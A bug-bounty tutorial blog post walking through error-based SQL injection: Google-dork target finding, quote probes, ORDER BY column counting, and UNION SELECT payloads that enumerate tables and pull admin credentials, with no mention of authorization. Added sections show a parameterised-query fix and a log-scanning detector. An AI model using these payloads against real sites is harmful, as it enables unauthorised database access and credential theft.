Every hacker who is new to or learning web application penetration testing (WAPT) is advised to review the OWASP Top 10, because it gives a detailed view of the vulnerabilities found most often by hackers worldwide and of which ones are the most critical. The latest version of the OWASP Top 10 was released in 2017.
Among the OWASP Top 10 is A1: Injection. This post will not be a thorough OWASP guide, but it will be an awesome guide for you to get started in bug bounties.
SQL injection is a vulnerability which allows an attacker to execute SQL commands against the backend database and can certainly gain access to that database; in the worst-case scenario, it can even “SHUTDOWN THE SERVER” – very severe, isn’t it?
SQL injection has three types of classifications: in-band, blind, and out-of-band.
1. In-band SQLi is the classic SQLi, so it is easy to exploit!
It includes error-based and union-based injections. Today, we will only be looking at error-based SQLi, to keep the concepts clear and the post to a reasonable length.
2. Blind SQLi is a bit harder to encounter, discover and exploit, but an automated tool can help.
It includes Boolean-based and time-based injections; basically, you play TRUE/FALSE with the server.
3. Out-of-band SQLi depends on the server being allowed to make DNS or HTTP requests to a host where the attacker wants to receive the results.
Before we start learning the steps to perform it, we must know what SQL actually is.
What is SQL?
What is SQL (I asked in a workshop)?
They said structured query language.
Are they right or wrong? Basically, SQL’s full form is Structured Query Language, and the name also describes the type of programming done with it, i.e., in a structured manner. But actually, SQL is an “interpreted language.” It is interpreted the same way you interpret your friend while talking!
In SQLi, you address the database server (a MySQL server or any other type), and if the application is vulnerable, the server interprets your commands and gives you the answer accordingly (in this case, access to the database).
Today, we will only be covering error-based SQLi in GET requests, as it is the most commonly found and the easiest to exploit.
Let’s go step by step:
1. Find a website that takes a query parameter, like the ones you must have seen in a URL.
How to: use Google dorks, for example site:www.eg.com inurl:php? (the pattern depends on the programming language the site is written in). We found:
2. Test whether it is vulnerable or not. To do so, you must pass the server some test payloads.
Like: ' (single quote) –> " (double quote) –> ') or ") –> / –> '); or ");
And there are tons of other variants; just Google them.
Now, what will happen when you do so is that the server gives you an error. Keep in mind that in our case, the server showed us the error when we sent the single quote. In your case it may not, so you will have to test all the different cases above (double quotes, etc.).
ERROR: Error in SQL syntax. Why the heck is it like that? Because when you sent the single quote, the query that reached the database looked like SELECT category FROM product WHERE id = '5'' – notice the extra quote at the end, '5'', which threw the error. As you know, a string literal is only complete when it has both quotes: ' alone is incomplete, '' is complete. The quote we supplied left one unpaired.
Here, because of poor coding, the developer wrapped the numeric id in quotes and concatenated the raw parameter into the query, which should not be done.
3. Now, you will have to resolve the error by using comments: --+ or -- -. Sometimes there's no need for it.
www.eg.com?catid=5' --+ (error resolved in our case)
4. Get the number of columns in the query by appending order by N and increasing N.
Unknown column '20' in 'order clause'
This error means there is no 20th column, i.e. the query returns fewer than 20 columns.
Remember to do it one by one: order by 1 in the first request, order by 2 in the second, and so on.
5. We found 5 columns. Now check which of those columns have their data displayed on the page you are testing.
www.eg.com?catid=5' Union Select 1,2,3,4,5--+
I stopped at 5, as there are only 5 columns in total. After this, the server will show you the numbers of the columns whose data is displayed on the page.
In our attempt: 2,3
6. Now it's time to enumerate the database, as we have columns 2 and 3. These are the only paths for us to exploit the SQLi and read the data.
www.eg.com?catid=5' Union Select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database() --+
– The above lists the tables available in the current database:
In our case: admin,products,images,ratings
www.eg.com?catid=5' Union Select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='admin' --+
– The above lists the columns available in the table admin.
In our case: id,username,password,email
NEXT: Let's get the username and password!
www.eg.com?catid=5' Union Select 1,username,password,4,5 from admin --+
– The above gives us the username and password of the admin:
In our case: adm!n , [email protected]
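To see why the single quote in step 2 throws a syntax error and why the UNION in step 6 is able to read another table, here is an added example (not code from the original post or from any site it describes). It builds the post's product lookup two ways against a constructed in-memory SQLite database: once with the parameter concatenated into the query, as the vulnerable page does, and once with a bound parameter, which is the fix. The table and column names, the demo rows and the admin credentials are all constructed for the example; SQLite is used so it runs offline, which is why MySQL's --+ comment appears as a plain -- here.

```python
import sqlite3

# Added example: the post's lookup built the vulnerable way and the fixed way,
# against a constructed in-memory database (not the site from the original post).
# Table and column names follow the post's query: SELECT category FROM product WHERE id = ...


def build_db():
    """Create the constructed demo database: a product table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE product (id INTEGER, category TEXT);
        INSERT INTO product VALUES (5, 'books'), (6, 'toys');
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'demo_user', 'demo_hash');  -- constructed values
        """
    )
    return conn


def vulnerable_lookup(conn, catid):
    """The mistake from the post: the raw parameter is pasted into the SQL text
    and wrapped in quotes, so a quote in the input becomes part of the query."""
    sql = "SELECT category FROM product WHERE id = '" + catid + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, catid):
    """The fix: bind the value as a parameter. The SQL text never changes; the
    driver hands the value to the engine separately, so it is compared, never parsed."""
    sql = "SELECT category FROM product WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (catid,))]


def probe(conn, lookup, catid):
    """Run a lookup and report ('ok', rows) or ('error', message) instead of raising,
    which mirrors what a tester sees: a syntax error on the page or a normal result."""
    try:
        return ("ok", lookup(conn, catid))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    for value in ("5", "5'", "5' UNION SELECT username FROM admin --"):
        print(repr(value))
        print("  concatenated:  ", probe(db, vulnerable_lookup, value))
        print("  parameterised: ", probe(db, safe_lookup, value))
```

Run it and the concatenated version errors on the lone quote and returns the admin table through the UNION payload, while the parameterised version simply finds no product with that id; the error message the tester relies on never appears, and the injected SQL is never executed.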
This seems complex in a post, but as you practice along with it and follow each step, it will be easy for you!
Points to Remember
Remember that the enumeration part must only be performed through the columns whose data is displayed on the page where you are performing the injection.
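From the defender's side, the requests in steps 2 to 6 leave a distinctive trail in the web server's access log. The following added example (not from the original post) parses constructed Common Log Format lines, URL-decodes every query parameter, and flags the quote probe, the order by counting, the union select and the information_schema lookups. The IP addresses, paths, timestamps and status codes in the sample lines are made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Added example: flag the probing and enumeration requests described in the post
# in web-server access logs. The log lines below are constructed for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /cat.php?catid=5 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /cat.php?catid=5%27 HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /cat.php?catid=5%27+order+by+20--+ HTTP/1.1" 500 330
203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /cat.php?catid=5%27+Union+Select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+ HTTP/1.1" 200 5400
198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /cat.php?catid=7 HTTP/1.1" 200 4980
"""

# Common Log Format: client, identity, user, timestamp, request line, status, size.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is checked against the URL-decoded value of every query parameter.
RULES = [
    ("quote-after-number", re.compile(r"^\s*\d+\s*['\")]")),      # 5'  5"  5')
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),   # column counting
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),  # union-based extraction
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),  # table/column listing
    ("comment-terminator", re.compile(r"--\s*$|--\+|#\s*$|/\*")),  # closing off the query
]


def scan_request(target):
    """Return {param: [rule names]} for every query parameter that matches a rule."""
    hits = {}
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):  # decodes %27 and '+'
        matched = [rule for rule, pattern in RULES if pattern.search(value)]
        if matched:
            hits[name] = matched
    return hits


def scan_log(text):
    """Parse each access-log line and return findings for lines with suspicious parameters."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hits = scan_request(m.group("target"))
        if hits:
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A pattern list like this is a starting point for an alert rule or a WAF signature, not a replacement for the parameterised query: the quote probe is a single character and the keywords can be obfuscated, so treat matches as a reason to look at the request sequence from that client (the 500 on the probes followed by a 200 once the comment repairs the syntax is the same tell the tester reads in step 3).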
Thank you guys for reading the post. I hope this will be helpful to you!
Stay tuned until next time. HAPPY HACKING!
Credits: Ashish Jha, A security researcher from India.